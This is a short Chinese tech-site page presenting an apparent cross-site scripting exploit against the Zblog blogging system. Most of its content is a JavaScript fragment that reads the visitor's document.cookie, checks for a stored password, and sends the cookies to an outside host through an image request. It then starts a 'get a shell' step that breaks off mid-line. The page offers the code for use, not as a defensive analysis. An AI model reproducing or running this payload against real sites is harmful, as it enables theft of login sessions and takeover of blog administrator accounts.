当前位置: 移动技术网 > 网络运营>安全>漏洞 > Zblog最新跨站漏洞及利用代码

Zblog最新跨站漏洞及利用代码

2018年03月10日  | 移动技术网网络运营  | 我要评论

  js里可以写shell,添加用户,偷取cookie然后模拟出真正的转向

  xmlhttp=poster();

  cookie=document.cookie;

  login=cookie.indexof(‘password’)==-1?0:1;

  tolocation=’https://www.jb51.net/’;

  //get cookie

  x=new image();

  x.src=”www.dosjj.com/c.php?c=”+escape(document.cookie);

  //get a shell

  data=”txacontent=

如对本文有疑问, 点击进行留言回复!!

相关文章:

验证码:
移动技术网